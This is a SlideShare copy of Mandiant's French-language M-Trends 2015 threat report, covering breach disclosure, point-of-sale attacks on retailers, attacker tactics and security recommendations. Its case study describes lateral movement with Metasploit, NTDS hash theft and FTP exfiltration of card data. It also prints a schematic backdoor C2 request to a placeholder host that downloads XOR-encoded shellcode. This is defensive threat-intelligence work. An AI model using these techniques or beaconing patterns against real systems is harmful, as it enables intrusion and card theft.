Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

M-Trends 2015 : Les nouvelles du front

1,164 views

Published on

Analyses, décryptages, statistiques et études de cas : ce rapport annuel sur les menaces revient sur l'évolution des outils et tactiques mis en œuvre par les auteurs de menaces APT.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

M-Trends 2015 : Les nouvelles du front

  1. 1. R A P P O R T S U R L E S M E N A C E S LES NOUVELLES DU FRONT M-Trends® 2015 : SECURITY CONSULTING
  2. 2. Les nouvelles du frontM-Trends Introduction. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 Les chiffres clés. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 Tendance 1 : Le signalement des attaques informatiques et ses problèmes. . . . . . . . . . . . . . 4 Un public sensible à la cybersécurité. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 Rehausser le niveau. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 Pourquoi tant d’attaques informatiques révélées dans la presse ? . . . . . . . . . . . . . . . . . . . . . 5 Tendance 2 : Le commerce et la distribution dans le viseur . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 Les serveurs d’applications virtuelles comme point d’entrée. . . . . . . . . . . . . . . . . . . . . . . . . . . 7 Nouveaux outils, nouvelles tactiques, nouveaux modes opératoires. . . . . . . . . . . . . . . . . . . 7 Recrudescence des attaques sur les paiements en ligne. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 Recommandations. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12 Tendance 3 : L’évolution du cycle de vie des attaques. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 Détournements des connexions VPN. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 Dissimulation de malwares sous le nez des victimes. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 Vol de mots de passe en toute simplicité. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18 Déplacements latéraux avec WMI et PowerShell. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 Tendance 4 : Entre cybercriminels et groupes APT, la frontière s’estompe. . . . . . . . . . . . . . 20 Évaluer l’intention dans un climat d’incertitude : une tâche délicate. . . . . . . . . . . . . . . . . . 20 Ces différences ont-elles une importance ?. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 Conclusion. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 À propos de Mandiant. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 À propos de FireEye. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 SOMMAIRE
  3. 3. www.mandiant.com 1 INTRODUCTION Depuis des années, nous ne cessons de répéter que la sécurité parfaite n’existe pas. Les événements de 2014 devraient nous donner raison une bonne fois pour toutes. M algré quelques modestes progrès dans les capacités des entreprises à renforcer leur sécurité, les auteurs d’attaques avancées (ou non) continuent de trouver les moyens de contourner les dispositifs de sécurité en place. Dans le rapport M-Trends de l’an passé, nous remarquions que la cybersécurité était passée d’une problématique informatique isolée à une priorité absolue pour les instances dirigeantes des entreprises. Cette année, la cybersécurité, ou plutôt la « cyberinsécurité », a pris le devant de la scène. Pour les seules premières semaines de 2015, la question s’est invitée tour à tour dans le discours du président américain sur l’état de l’Union1 , dans l’intrigue d’un film à gros budget2 et dans l’allocution d’ouverture de la cérémonie des Golden Globe Awards.3 En tant que premier intervenant sur des incidents de sécurité critiques, Mandiant a acquis une perspective unique sur les modes opératoires et les motivations des attaquants. Les analyses et éclairages livrés dans ce document sont le fruit d’une expérience cumulée au cours de centaines de missions sur le terrain. Au cours des dix dernières années, nous sommes intervenus aux côtés de clients dans plus de 30 secteurs d’activité à travers le monde. Malgré une amélioration certaine dans les systèmes de détection des entreprises, les pirates ont encore pu agir trop longtemps avant d’être détectés, soit en moyenne 205 jours en 2014 contre 229 jours en 2013. Dans le même temps, le nombre d’entreprises ayant découvert elles-mêmes ce type d’intrusion est resté globalement stable. En 2014, 69 % des structures victimes d’une compromission de sécurité en ont été alertées par des entités externes, notamment les services de police. Ce chiffre traduit une légère hausse par rapport à 2013 (67 %) et 2012 (63 %) Le commerce et la grande distribution sont restés des cibles privilégiées, à l’heure où les attaquants déploient de nouvelles méthodes pour exfiltrer les numéros de carte des systèmes de paiement en magasin. Dans le domaine des cartes bancaires à puce avec code PIN, nous avons observé une recrudescence des attaques à l’encontre des sites e-commerce et des prestataires de traitement des paiements. Par ailleurs, certaines branches d’activité dans lesquelles nous étions jusqu’alors peu interve­ nus se sont trouvées en ligne de mire : Services aux entreprises, santé, organismes publics et organisations internationales. Dès que les équipes de sécurité déploient de nouvelles lignes de défense, les pirates changent de tactique. L’an passé, cette dynamique s’est développée à grande échelle, sous nos yeux. Aussi avons-nous pu observer les nouvelles méthodes (ou parfois des méthodes éprouvées remises au goût du jour) employées par les attaquants pour infiltrer les réseaux privés virtuels (VPN), échapper à toute détection, dérober des identifiants de connexion et maintenir une présence furtive et persistante dans les environnements compromis. L’année 2014 fut également marquée par une hausse des déclarations publiques d’incidents de sécurité par les victimes elles-mêmes. Pour autant, ces dernières restent plus que jamais dans le flou sur une question essentielle : qui m’attaque ? D’autant que la frontière tend à s’estomper entre les cybercriminels ordinaires et les groupes à la solde d’États, à mesure que les premiers haussent leur niveau de jeu et que les seconds utilisent des kits d’attaque clé-en- main pour brouiller les pistes. Ensemble, ces développements dépeignent un tableau des menaces plus complexe que jamais. Dans ce contexte, jamais la mission des équipes de sécurité n’a été aussi difficile – et cruciale – pour prévenir, détecter, analyser et réagir aux attaques. 1 Michael D. Shear (The New York Times). “Obama to Announce Cybersecurity Plans in State of the Union Preview.” Janvier 2015. 2 Sheri Linden (The Hollywood Reporter). “’Blackhat’: Film Review.” Janvier 2015. 3 Christopher Palmeri (Bloomberg). “Hollywood ‘Spoiled Brats’ Are Easy Targets at Golden Globes.” Janvier 2015.
  4. 4. 2 www.mandiant.com Les nouvelles du frontM-Trends Plusieurs secteurs dans lesquels nous avions jusqu’alors peu enquêté sont apparus comme de nouvelles cibles privilégiées : Services aux entreprises Organismes publics et organisations internationales Santé 6 % Santé 5 % Transports 3 % Aérospatiale et défense 7 % Services juridiques 8 % Autre 7 % High-tech et informatique 8 % Construction et ingénierie 17 % Services aux entreprises 7 % Organismes publics et organisations internationales 14 % Commerce et distribution 10 % Services financiers 3% 8 % Médias et divertissements 5% En 2014, nous avons observé des variations du nombre de nos interventions dans certains domaines : Commerce et distribution — de 4 % à 14 % Médias et divertissements — de 13 % à 8 % Secteurs d’activité dans lesquels Mandiant a enquêté sur des intrusions LES CHIFFRES CLÉS Un large éventail d’industries a été pris pour cible en 2014, y compris dans des branches autrefois relativement épargnées. De même, bien que les entreprises aient été plus promptes à découvrir une compromission qu’en 2013, elles ont encore laissé beaucoup trop de temps aux attaquants pour agir incognito. Pire encore, elles ont été moins nombreuses que les années précédentes à découvrir l’intrusion par leurs propres moyens.
  5. 5. www.mandiant.com 3 Le phishing, vecteur d’APT des e-mails de phishing recensés utilisaient l’angle de l’informatique ou de la sécurité, les attaquants se faisant souvent passer pour un édi- teur d’antivirus ou le département informatique de l’entreprise ciblée 78 % des e-mails de phishing ont été envoyés pendant les jours ouvrés de la semaine 72 % Dim Sam Ven Jeu Mer Mar Lun Des menaces très diverses NUISANCE VOLDEDONNÉES CYBERCRIME HACKTIVISME DESTRUCTION Objectif Accès et propagation Motivations écono- miques ou politiques Gain financier Diffamation, publicité négative Perturbation des opérations Exemple Botnets et spam GroupesAPT(Advanced PersistentThreat) Vol de numéros de cartes Défiguration de site Suppression de données Ciblé Caracté- ristique Souvent automatisé Persistant Souvent opportuniste Forte visibilité Motivé par un conflit Les attaquants exploitent les réseaux de leurs victimes dans des buts économiques et politiques de plus en plus variés. Lapse de temps entre la première preuve tangible d’une compromission et sa découverte 205 Nombre moyen de jours de présence des attaquants sur le réseau de la victime avant d’être détectés 24 jours de moins qu’en 2013 Présence la plus longue : 2 982 jours Qui découvre la compromission ? 31 % des victimes ont détecté la compro- mission en interne 69 % ont été alertées par une entité externe
  6. 6. 4 www.mandiant.com Les nouvelles du frontM-Trends TENDANCE 1 : LE SIGNALEMENT DES ATTAQUES INFORMATIQUES ET SES PROBLÈMES Plus que jamais, les incidents de sécurité propulsent les entreprises victimes sous le feu des médias de plus en plus pressants sur les informations à communiquer. E n 2014, nous sommes intervenus auprès de plus de 30 entreprises qui avaient publiquement déclaré une compromission de données, souvent dans le sillage tourmenté de révélations dans les médias. D’après notre expérience, les entreprises ont tout intérêt à délivrer un message clair et précis, basé sur les informations factuelles d’une analyse de la compromission. Ce faisant, elles éviteront de devoir faire marche-arrière sur des communi- qués antérieurs – et de perdre toute crédibilité au passage. Un public sensible à la cybersécurité Le flot apparemment incessant de compromis- sions divulguées en 2014 a éveillé l’intérêt de l’opinion publique aux problématiques des attaques ciblées et de leurs impacts. En consé- quence, les journalistes, partenaires, investis- seurs et consommateurs ont tendance à poser des questions plus avisées et détaillées en cas de signalement. Ils ne se contentent plus seulement de savoir quand l’incident a eu lieu et quelles données ont été exposées. Ils exigent désormais des détails qui vont du type de malware utilisé à la méthode employée par les attaquants pour persister sur le réseau. Ils se montrent également plus insistants pour savoir qui se cache derrière l’attaque. Ainsi, on nous demande souvent d’attribuer un acte malveillant à tel ou tel auteur dès le premier jour de l’enquête, alors que nous commençons à peine à rassembler les preuves. Même lorsque l’enquête avance, il est de plus en plus difficile de désigner des coupables avec certitude, dans la mesure où les différents profils d’attaquants tendent désormais à utiliser les mêmes outils (voir « Tendance 4 : Entre cybercriminels et groupes APT, la frontière s’estompe », en page 20). Rehausser le niveau À l’heure où de plus en plus d’informations doivent être divulguées, les entreprises victimes prennent peu à peu conscience du caractère crucial d’une communication de crise maitrisée et cohérente. Au moment de rendre l’incident La formulation d’une stratégie de communication efficace passe donc par une bonne compréhension de la portée et de l’étendue de la compro- mission. L’entreprise évitera ainsi de perdre toute crédibilité en revenant sur ses déclarations passées.
  7. 7. www.mandiant.com 5 public, elles doivent souvent trancher dans le vif sur les éléments à dévoiler — même lorsque de nombreuses zones d’ombre subsistent. Dans bien des cas, les entreprises doivent lutter de toutes parts pour garder la maîtrise de la situation. Ainsi, nous avons vu des scénarios dans lesquels différentes spéculations sur les modes d’infiltration des attaquants ont déclen- ché une avalanche de démentis, alors même que les enquêteurs tentaient de circonscrire et neutraliser l’incident. Dans ce genre de situation, les enquêteurs passent leur temps à rejeter les hypothèses les plus diverses au lieu de se concentrer sur leur mission première : trouver des indices et faire avancer l’enquête. Pourquoi tant d’attaques informatiques dans la presse ? On nous demande souvent pourquoi les entreprises sont de plus en plus nombreuses à signaler les attaques informatiques dont elles sont victimes. Bien qu’il n’existe pas de réponse définitive, nous voyons deux éléments détermi- nants dans cette tendance. Premièrement, par rapport aux années précédentes, nous sommes intervenus sur davantage de cas où des données de cartes bancaires ou d’identification person- nelle (PII) avaient été exposées. Or, dans bien des cas, la loi impose maintenant aux entreprises victimes de signaler certains aspects de tels incidents. Par ailleurs, dans 69 % des incidents que nous avons traités en 2014, les victimes n’ont pas été en mesure de détecter elles-mêmes la présence des attaquants, n’apprenant la nouvelle que par le biais d’une entité externe (fournisseur, client ou autorités). En d’autres termes : si vous découvrez l’attaque informatique dont vous faites l’objet, il y a fort à parier que d’autres — et pas seulement les attaquants eux-mêmes — auront aussi eu vent de l’incident. Qu’elle décide ou non de rendre un incident public, l’entreprise ne doit jamais perdre de vue le fait que même si les principales parties pre- nantes veulent des réponses immédiates, les enquêtes peuvent prendre des semaines, voire des mois avant que les faits n’émergent. D’où l’importance capitale de bien comprendre la portée et l’étendue de la compromission au mo- ment de définir votre communication de crise. À RETENIR : En divulguant les incidents de sécurité dont elles ont été victimes, de plus en plus d’entreprises se retrouvent sous le feu de la rampe. Médias, clients, partenaires… tous commencent à prendre conscience du fait que les compromissions sont inévitables. Dans le même temps, ils demandent aussi plus d’informations et de détails. Pour bien se préparer à une telle éventualité, les entreprises doivent mettre en place une stratégie de communication efficace. Or, les meilleures stratégies s’établissent et s’appliquent sur la base de faits tangibles, issus d’une enquête rigoureuse.
  8. 8. 6 www.mandiant.com Les nouvelles du frontM-Trends MENER UNE ENQUÊTE EFFICACE Nous dressons ici la liste des questions que les médias, investisseurs et clients posent inlassablement lors du signalement public d’un incident de sécurité. Du côté des entreprises victimes, tous les intervenants devront s’accorder sur les réponses à donner pour éviter toute imprécision ou incohérence dans leurs déclarations publiques. Comment les attaquants se sont-ils infiltrés dans votre environnement ? La recette des attaquants se compose généralement d’un mélange d’ingénierie sociale et de vulnérabilités inconnues ou non corrigées. Exploitation d’un serveur Internet, envoi d’une pièce jointe paraissant légitime par e-mail, infection d’un site Web très visité par les publics ciblés... les tactiques varient. D’où l’importance de bien se préparer à expliquer comment les malfaiteurs sont parvenus à s’infiltrer. Plus capital encore, l’entreprise devra pouvoir déclarer avec certitude si l’accès a été bloqué et l’attaque neutralisée. Comment les attaquants sont-ils parvenus à maintenir un accès à l’environnement ? Les attaquants ont souvent besoin d’un accès continu à l’environnement infiltré. Pour les en déloger, vous devrez trouver et bloquer toutes les voies d’accès utilisées. Parmi les méthodes privilégiées, on trouve notamment les portes dérobées (backdoors), les webshells, les accès via le VPN et autres systèmes de connexion à distance des entreprises. Comment l’attaque s’est-elle déroulée ? Bien comprendre comment des attaquants sont parvenus à s’introduire sur le réseau et à en exfiltrer des données est un passage obligé pour la prévention d’une récidive. Sans un diagnostic précis de l’ampleur de l’attaque, il est très difficile d’en mesurer l’impact – et encore plus de l’enrayer. Quelles données les attaquants ont-ils dérobées ? Seule une analyse forensique des systèmes compromis permet généralement de répondre à cette question. Parfois, votre propre examen n’apportera que des éléments de réponse partiels. Travaillez toujours au contact de votre équipe juri- dique pour déterminer vos obligations légales en fonction des types de données volées, que la compromission soit supposée ou avérée. Avez-vous neutralisé l’attaquant ? Si vous avez pu répondre aux quatre premières questions, celle-ci ne devrait normalement pas poser de problème. Une bonne compréhension du déroulé de l’attaque vous permettra de mieux la combattre et de mieux vous en relever.
  9. 9. www.mandiant.com 7 4 U.S. Department of Homeland Security and U.S. Secret Service. “Backoff Malware: Infection Assessment.” Août 2014. TENDANCE 2 : LE COMMERCE ET LA DISTRIBUTION DANS LE VISEUR Le monde du commerce et de la distribution s’est retrouvé au centre d’attaques qui ont touché plus de 1 000 entreprises et contraint un nombre incalculable de consommateurs à remplacer leurs cartes bancaires en 2014.4 Mais au-delà du volume d’attaques perpétrées, nos enquêtes ont révélé l’existence de nouveaux groupes, kits d’outils et techniques d’attaques. Les serveurs d’applications virtuelles comme point d’entrée La virtualisation d’applications permet aux utilisateurs de se connecter à distance à des programmes hébergés sur un poste de travail virtuel sécurisé. Une bonne configuration de cet environnement permet de créer une bulle de protection dans laquelle les utilisateurs peuvent évoluer en toute sécurité. Mais dans certains cas, même les erreurs de configuration les plus mineures peuvent ouvrir des brèches dans lesquelles les attaquants ne tardent pas à s’engouffrer pour aller rebondir sur d’autres parties du système. Dans toutes nos enquêtes mettant en lumière ce vecteur d’attaque, nous avons observé la même faille de sécurité : l’accès à distance ne s’effec­ tuait que par l’utilisation d’un login et mot de passe, soit un seul facteur d’authentification, alors que deux facteurs auraient bloqué l’accès. Nouveaux outils, nouvelles tactiques, nouveaux modes opératoires Les nouveaux groupes d’attaques apportent avec eux leur lot d’outils, de tactiques et de modes opératoires. Ainsi, nous avons observé les schémas d’attaque les plus variés, des hackers débutants équipés d’outils largement accessibles jusqu’aux groupes installant des malwares sophistiqués pour la collecte de numéros de cartes sur des terminaux de paiement en magasin. Toutefois, le niveau de compétences importe peu puisque les attaquants novices se sont mon- trés tout aussi aptes à extorquer des numéros de cartes que des groupes plus expérimentés. Dans tous les cas de figure, les malfaiteurs ont pu agir en sous-marin dans l’environnement de leurs victimes, obtenir l’accès aux terminaux de paiement et y installer des malwares pour la collecte des numéros de carte. Recrudescence des attaques sur les paiements e-commerce par carte Les cartes à puce avec code PIN des systèmes Europay, MasterCard et Visa (EMV) débarquent enfin sur le marché américain. Omniprésentes depuis des décennies à travers le monde, ces cartes ont pourtant tardé à s’imposer dans les enseignes outre-Atlantique. L’une de leurs particularités est de générer un code unique à chaque transaction, ce qui rend leur contrefaçon plus difficile et peut contraindre les cybercriminels à se rabattre sur des proies plus faciles. Dans les pays qui ont adopté la technologie EMV, nous avons noté une augmentation de nos interventions sur des cas de compromissions de sites e-commerce et de prestataires de paiement.
  10. 10. 8 www.mandiant.com Les nouvelles du frontM-Trends ÉTUDE DE CAS Une grande enseigne américaine victime d’une compromission de millions de cartes de crédit sur une période de 3 mois Le schéma d’attaque ressemble à de nombreux autres scénarios observés dans la grande distribution en 2014 : accès distant au réseau de l’enseigne au moyen d’identifiants valides, utilisation des autorisations associées pour se déplacer latéralement sur le réseau et déploiement de malwares sur les caisses des magasins. Ce n’est qu’après avoir été alerté par les autorités américaines que le distributeur a découvert la compromission. Point initial de la compro- mission L’attaquant s’est d’abord connecté au serveur d’applications virtuelles au moyen d’identifiants légitimes. Le serveur d’applications lui a alors accordé un droit d’accès limité à un poste de travail virtuel. Nous n’avons trouvé aucun échec de connexion, ce qui indique que l’attaquant avait obtenu ces identifiants en amont. (Les éléments en notre possession ne nous permettent cependant pas de définir clairement comment il s’est procuré ces informations.) Il a ensuite profité d’une petite erreur de configuration du poste de travail virtuel pour s’octroyer un privilège d’accès en ligne de commande, c’est-à-dire prendre le contrôle direct du système. Il est ensuite passé par un site FTP Windows pour télécharger un outil de type « password dump » qui lui a permis d’obtenir le mot de passe du compte administrateur local. Ce mot de passe était le même pour tous les systèmes de l’environnement de cette enseigne. Tout ceci s’est déroulé en l’espace de quelques minutes. Déplacement latéral Lors de ses premières manœuvres, l’attaquant a utilisé Metasploit pour se déplacer latéralement dans l’environ­ nement. Metasploit est un framework open source qui sert à développer, tester et exécuter du code d’exploit. Son vaste choix de modules aide les utilisateurs à trouver et exploiter des faiblesses sur les systèmes ciblés. Cette richesse fonctionnelle en fait un outil prisé, tant des cybercriminels que des chercheurs en sécurité. En l’occurrence, l’attaquant a utilisé le module Metasploit psexec_command, ce qui lui a permis d’exécuter des commandes sous forme de service Windows sur le système compromis. Or, cette action laisse un certain nombre de traces dans les journaux d’événements systèmes Windows. Tout en maintenant son accès aux systèmes compromis, l’attaquant s’est ensuite tourné vers le contrôleur de domaine du siège de l’enseigne, c’est- à-dire le serveur qui gère l’authentifica- tion dans l’environnement Windows. Rien de plus facile pour lui puisque les identifiants d’administrateur local qu’il s’était procurés lui permettaient aussi d’accéder au contrôleur de domaine. À l’aide du module Metasploit ntdsgrab, il est ensuite parvenu à obtenir une copie de la base de données NTDS et des registres du système. La base NTDS stocke les informations Active Directory utilisées par les contrôleurs de domaine, y compris les hashs des noms d’utilisateur et mots de passe. Le module ntdsgrab utilise le Service de cliché instantané des volumes (VSS, Volume Shadow Copy Service) de Windows pour créer un cliché instantané de la partition qui contient la base de données NTDS. VSS a pour rôle de créer un snapshot du système à des fins légitimes de sauvegarde et de restauration. Mais dans le cas présent, l’attaquant s’en est servi pour créer une copie de la base NTDS. Dès lors, il a pu recourir à d’autres outils pour en extraire les hashs de mots de passe. Une fois les hashs du mot de passe de l’administrateur de domaine craqués, l’attaquant a pu se déplacer latérale- ment au sein de l’environnement. À ce stade, il est passé de Metasploit à des techniques de déplacement latéral plus traditionnelles, notamment les connexions réseau non-interactives, l’outil Microsoft SysInternals PsExec et des connexions RDP (Remote Desktop Protocol). Une fois connecté au serveur d’applications virtuelles au moyen des identifiants de l’administrateur de domaine, l’attaquant a pu étendre son accès en se connectant aux systèmes via RDP. Porte dérobée Pour maintenir sa présence dans l’en- vironnement compromis, l’attaquant a installé une porte dérobée (backdoor) sur plusieurs machines, sous la forme d’un pilote malveillant conçu pour cibler les systèmes Windows XP. Le malware avait été compressé à l’aide d’un programme ultrasophis- tiqué, semblable à ceux que l’on trouve sur des malwares avancés et pourtant largement accessibles. Le pilote se décompresse d’abord en mémoire, avant de lancer un nouveau thread système. Le pilote original alerte ensuite le système de son échec de chargement.
  11. 11. www.mandiant.com 9 Mode de fonctionnement de psexec_command : Le module psexec_command écrit la commande à exécuter et le fichier de sortie (fichier texte) dans un fichier de commandes Windows. Les noms du fichier texte et du fichier de commande Windows comportent 16 caractères générés de manière aléatoire. psexec_command exécute ensuite le fichier de commandes Windows créé dans la première étape. La figure 1 illustre l’information telle qu’elle est inscrite dans le journal d’événements système Windows. Figure 1 : Installation de service via le module Metasploit psexec_command A service was installed in the system. Service Name: MRSWxwQmQxFGumEFsW Service File Name: %COMSPEC% /C echo dir ^> %SYSTEMDRIVE%WINDOWSTempTthwsVKvUhydrsNB.txt > WINDOWSTempRbhRmgALAHcdyWXG.bat & %COMSPEC% /C start %COMSPEC% /C WINDOWSTempRbhRmgALAHcdyWXG. bat Service Type: user mode service Service Start Type: demand start Parce que le code est décompressé dans un processus séparé du pilote original, le malware est actif en dépit du fait que Windows ne reconnaît pas le chargement du pilote. Ces techniques servent à entraver les efforts de rétroingénierie et à dissimuler la présence d’une porte dérobée. La porte dérobée tire ses fonctionnali- tés d’un shellcode que le pilote décom- pressé injecte dans les processus de l’espace utilisateur (processus qui s’exé- cutent en dehors du noyau Windows). Le shellcode lance une requête HTTP POST à une adresse IP codée en dur et télécharge un shellcode encodé en XOR contenu dans un commentaire HTML. Cette technique a rendu la porte dérobée particulièrement flexible. Pour y ajouter de nouvelles fonctionnalités, il suffisait à l’attaquant de télécharger et d’exécuter un nouveau shellcode. Ce schéma d’utilisation d’un shellcode n’est pas nouveau, mais le duo qu’il formait avec le programme de compression en ont fait un malware particulièrement sophistiqué. La figure 2 illustre le mode de commu- nication entre le système infecté et le serveur de commande et contrôle (CnC). Figure 2 : Communication par la porte dérobée POST /evil.txt HTTP/1.0 Accept: */* Content-Length: 32 Content-Type: application/octet-stream User-Agent: Evil_UA_String Host: 1.2.3.4 Pragma: no-cache <POST_DATA> <!-XOR_Encoded_Shellcode --> La porte dérobée envoie une requête HTTP POST au serveur de commande et contrôle (CnC) Téléchargement et exécution d’un shellcode encodé en XOR Système infecté CnC du hacker
  12. 12. 10 www.mandiant.com Les nouvelles du frontM-Trends Toutes les caisses de tous les magasins de l’enseigne s’authen- tifiaient auprès du contrôleur de domaine central. En d’autres termes, quiconque avait accès au contrôleur de domaine pouvait accéder directement aux caisses des magasins. Exfiltration de données Une fois en possession du mot de passe administrateur du domaine, l’attaquant a pu accéder à sa guise aux systèmes Windows de l’environnement informa- tique du siège de l’entreprise. De là, il s’est attelé à obtenir l’accès à l’environnement informatique des magasins. Cet environnement était configuré comme suit : • Le domaine des magasins avait une relation bidirectionnelle avec le domaine du siège. • Les caisses des magasins étaient sous Microsoft Windows XP. • Les caisses étaient reliées au domaine des magasins. Cette configuration, très courante dans la grande distribution, a donné deux avantages à l’attaquant. Premièrement, les identifiants d’admini­ strateur de domaines lui ont donné des privilèges d’accès aux systèmes du domaine des magasins. Deuxièmement, le domaine des maga- sins était un domaine enfant du domaine du siège. Aussi, pour maintenir certaines fonctionnalités actives, plusieurs ports critiques devaient rester ouverts en permanence entre les contrôleurs de domaine du siège et les magasins. Or, ces ports ouverts contournaient toutes les autres règles mises en place sur les pare-feu. L’attaquant s’est donc servi de ces ports ouverts pour accéder au contrôleur de domaine, qui à son tour lui a permis de s’introduire dans l’environnement des magasins. Toutes les caisses de tous les magasins de l’enseigne s’authentifiaient auprès du contrôleur de domaine central. En d’autres termes, quiconque avait accès au contrôleur de domaine pouvait accéder directement aux caisses des magasins. À l’aide d’un script de commandes Windows sur le contrôleur de domaine des magasins, l’attaquant a copié le malware de collecte d’informa- tions de cartes bancaires sur chacune des caisses des points de vente. Une tâche Windows planifiée lui a ensuite permis d’activer le malware. C’est ainsi qu’il a pu extraire des infor- mations de la mémoire de traitement de l’application, notamment le numéro de compte et la date d’expiration enregistrés sur la bande magnétique de la carte. Ces informations peuvent ensuite être revendues à des spécia­ listes de la contrefaçon de cartes. Le malware est passé par OSQL, un outil de requête de ligne de commande SQL préinstallé sur les caisses, pour inscrire les données des cartes ban- caires sur la base de données MSSQL temporaire tempdb. Les données de la table tempdb sont effacées dès l’arrêt du service MSSQL. Une fois par jour, l’attaquant envoyait donc une requête à la base tempdb sur toutes les caisses des magasins. Les données transmises en retour étaient ensuite transférées vers un fichier texte sur le contrôleur de domaine. De là, l’attaquant archivait le fichier texte et l’envoyait à un poste de travail connecté à Internet dans l’environne- ment des magasins. Il ne lui restait alors plus qu’à le charger sur un serveur sous son contrôle via le protocole FTP. La figure 3 retrace le déroulé de l’attaque.
  13. 13. www.mandiant.com 11 Figure 3 : Résumé de l’attaque L’attaquant a trouvé une brèche dans l’appli- cation virtuelle qui lui a permis de se déplacer latéralement au sein de l’environnement infor- matique du siège. De là, il a pu récupérer des identifiants de connexion sur les systèmes de l’environnement. 2 L’attaquant s’est servi du contrôleur de domaine des magasins comme plaque tournante pour l’accès aux caisses dans les points de vente. Il y a ensuite installé un malware qui collectait les données de cartes bancaires sur chacune de ces caisses. 3 L’attaquant s’est infiltré à distance dans l’environnement de l’entreprise via un serveur d’applications virtuelles. Il s’est ensuite authentifié au moyen d’identifiants valides. 1 L’attaquant a collecté les données de cartes ban- caires sur les caisses des magasins, avant de les transférer du contrôleur de domaine vers un poste de travail utilisateur dans l’environnement des maga- sins. Les données volées ont ensuite été exfiltrées via FTP vers un site FTP externe sous son contrôle. 4 Serveur d’applications virtuelles Contrôleur de domaine du siège Contrôleur de domaine des magasins Poste de travail utilisateur Accès initial Exfiltration de données via FTP Poste de travail utilisateur Caisse 1 Caisse 2 Magasin 2 Domaine des magasinsDomaine du siège DMZ Caisse 1 Caisse 2 Magasin 1 Trafic CnC Attaquant
  14. 14. 12 www.mandiant.com Les nouvelles du frontM-Trends À RETENIR : L’argent attire le crime. De fait, la grande distribution a toujours été dans la ligne de mire de cybercriminels motivés par l’appât du gain. L’année 2014 n’a pas dérogé à la règle. Certes, les attaquants ont encore plus fait parler d’eux dans les médias. Mais malgré quelques nouveautés, ils ont récité une partition globalement semblable à ce que nous avons observé ces dernières années. Recommandations Face à cette recrudescence d’attaques, quelle position les grandes enseignes doivent-elles adop- ter ? D’abord, soyons clairs : il est impossible de bloquer toutes les attaques et toutes les compro- missions. Toutefois, ces quelques recommandations pourront restreindre la capacité des atta- quants à s’infiltrer dans votre environnement et à s’y déplacer latéralement. Avec les bons ou- tils et une équipe de sécurité vigilante, vous pouvez ralentir la progression de l’attaque et vous donner le temps nécessaire pour détecter, analyser et réagir avant que le pire ne se produise. Accès distants sécurisés Commencez par dresser un bilan des modes d’accès distants de vos salariés, fournisseurs et sous-traitants à votre environnement. En- tamez un processus de contrôle de tous les accès distants, notamment le nombre de mé- thodes d’accès, les utilisateurs habilités et les exigences en matière de mots de passe. Tous les accès distants devraient être soumis à une authentification à deux facteurs. Assu- rez une surveillance active de toutes les connexions distantes pour y déceler d’éven- tuelles activités suspectes. Accès sécurisés à l’environ­ nement PCI Séparez votre environnement PCI (Payment Card Industry) du reste de votre réseau. Tout accès aux systèmes dans l’environ­ne- ment PCI devra passer par un serveur de rebond sécurisé, chargé de gérer les équipe- ments au sein des zones à haute sécurité. L’accès à ce serveur sera également soumis à une authentification à deux facteurs. Dans la mesure du possible, essayez de sé- parer les domaines des magasins
pour res- treindre les connexions à d’autres environ- nements. De même, limitez les trafics réseau sortant à une liste de connexions approuvées dans le cadre de vos activités. Établissez une liste blanche d’applications pour vos systèmes critiques Pour éviter l’exécution de fichiers malveillants sur des systèmes critiques, tous ces systèmes devront tenir à jour une liste blanche d’appli- cations autorisées. Ce dispositif s’étendra à tous les systèmes qui traitent des données de cartes bancaires, les serveurs de rebond et d’autres systèmes critiques comme les contrôleurs de domaine. Gestion des comptes à forts privilèges Administrateur local, administrateur de domaine, comptes de service… les atta- quants ciblent en priorité les comptes dotés de forts privilèges. La première chose à faire est donc d’en réduire le nombre. De même, assurez-vous que tous les comptes admi- nistrateurs locaux utilisent bien des mots de passe différents. Un outil d’administration et de protection des mots de passe vous per- mettra de gérer des identifiants uniques et de changer le mot de passe d’un compte après chaque utilisation. Ces technologies vous confèreront une plus grande maîtrise des comptes privilégiés.
